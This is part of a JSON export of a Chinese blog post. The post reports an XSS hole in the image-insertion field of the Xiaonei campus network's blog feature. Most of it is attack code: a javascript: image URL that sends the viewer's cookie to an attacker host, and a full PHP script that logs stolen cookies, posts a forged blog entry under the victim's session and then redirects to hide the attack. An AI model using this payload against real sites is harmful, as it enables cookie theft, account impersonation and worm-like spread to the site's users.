\u6821\u5185\u7f51\u5728\u53d1blog\u65f6\u5bf9\u63d2\u5165\u56fe\u7247\u8fc7\u6ee4\u4e0d\u4e25\u683c\uff0c\u5b58\u5728xss\u6f0f\u6d1e<\/p>\n
\u5728\u53d1blog\u65f6\u5c06\u63d2\u5165\u56fe\u7247URL\u5199\u4e3a\u5982\u4e0b\u4ee3\u7801\u5373\u53ef\u89e6\u53d1\uff1a<\/p>\n
\r\njavascript:window.location.href='http:\/\/xxxxx\/test.php?cookie='+document.cookie\r\n<\/pre>\ntest.php\u7684\u4f5c\u7528\u662f\u7a83\u53d6cookie\u3001\u4f2a\u9020\u9605\u89c8\u8005\u8eab\u4efd\u53d1\u4e00\u4e2ablog\u3001\u8df3\u8f6c\u5230\u4e00\u4e2a\u6b63\u5e38\u7684\u65e5\u5fd7,\u4ee3\u7801\u5982\u4e0b\uff1a<\/p>\n
\r\n<?php\r\nob_start();\r\n$url = \u2018blog.xiaonei.com\u2019;\r\n$cookie=$_GET['cookie'];\r\n$cookie1=$cookie."\\r\\n\\r\\n";\r\nfputs(fopen(\u2018a.txt\u2019,'a+\u2019),$cookie1); \/\/cookie\u5199\u5165 a.txt\r\n\r\n\/\/\u53d1\u4e00\u6761\u4f2a\u9020\u7684\u65e5\u5fd7\uff0c\u8fd9\u6761\u65e5\u5fd7\u91cc\u9762\u4e5f\u53ef\u4ee5\u63d2\u5165\u6076\u610f\u4ee3\u7801\r\n$sock = fsockopen("$url", 80, $errno, $errstr, 30);\r\nif (!$sock) die("$errstr ($errno)\\n");\r\n$data = "title=test by fly&body=test by fly&categoryId=0&blogControl=99&passwordProtedted=0&passWord=&blog_pic_id=&pic_path=&activity=&id=&relative_optpe=";\r\n\r\nfwrite($sock, "POST http:\/\/$url\/NewEntry.do HTTP\/1.1\\r\\n");\r\nfwrite($sock, "Accept: *\/*\\r\\n");\r\nfwrite($sock, "Referer: http:\/\/$url\\r\\n");\r\nfwrite($sock, "Accept-Language: zh-cn\\r\\n");\r\nfwrite($sock, "Content-Type: application\/x-www-form-urlencoded\\r\\n");\r\nfwrite($sock, "Accept-Encoding: gzip, deflate\\r\\n");\r\nfwrite($sock, "User-Agent: Mozilla\\r\\n");\r\nfwrite($sock, "Host: $url\\r\\n");\r\nfwrite($sock, "Content-Length: ".strlen($data)."\\r\\n");\r\nfwrite($sock, "Connection: Keep-Alive\\r\\n");\r\nfwrite($sock, "Cache-Control: no-cache\\r\\n");\r\nfwrite($sock, "Cookie:".$cookie."\\r\\n\\r\\n");\r\nfwrite($sock, $data);\r\n\r\n$headers = "";\r\nwhile ($str = trim(fgets($sock, 4096)))\r\n $headers .= "$str\\n";\r\necho "\\n";\r\n$body = "";\r\nwhile (!feof($sock))\r\n $body .= fgets($sock, 4096);\r\n\r\nfclose($sock);\r\n\/\/echo $body;\r\n\r\n\/\/\u8df3\u8f6c\u5230\u4e00\u4e2a\u6b63\u5e38\u7684\u65e5\u5fd7\r\nHeader("Location: http:\/\/blog.xiaonei.com\/GetEntry.do?id=xxxx&owner=xxxxx");\r\nob_end_flush();\r\n\r\n?>\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"\u6821\u5185\u7f51\u5728\u53d1blog\u65f6\u5bf9\u63d2\u5165\u56fe\u7247\u8fc7\u6ee4\u4e0d\u4e25\u683c\uff0c\u5b58\u5728xss\u6f0f\u6d1e \u5728\u53d1blog\u65f6\u5c06\u63d2\u5165\u56fe\u7247URL\u5199\u4e3a\u5982\u4e0b\u4ee3\u7801\u5373\u53ef\u89e6\u53d1\uff1a […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-309","post","type-post","status-publish","format-standard","hentry","category-skill"],"_links":{"self":[{"href":"https:\/\/kyle.ai\/blog\/wp-json\/wp\/v2\/posts\/309","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/kyle.ai\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/kyle.ai\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/kyle.ai\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/kyle.ai\/blog\/wp-json\/wp\/v2\/comments?post=309"}],"version-history":[{"count":2,"href":"https:\/\/kyle.ai\/blog\/wp-json\/wp\/v2\/posts\/309\/revisions"}],"predecessor-version":[{"id":5093,"href":"https:\/\/kyle.ai\/blog\/wp-json\/wp\/v2\/posts\/309\/revisions\/5093"}],"wp:attachment":[{"href":"https:\/\/kyle.ai\/blog\/wp-json\/wp\/v2\/media?parent=309"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/kyle.ai\/blog\/wp-json\/wp\/v2\/categories?post=309"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/kyle.ai\/blog\/wp-json\/wp\/v2\/tags?post=309"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}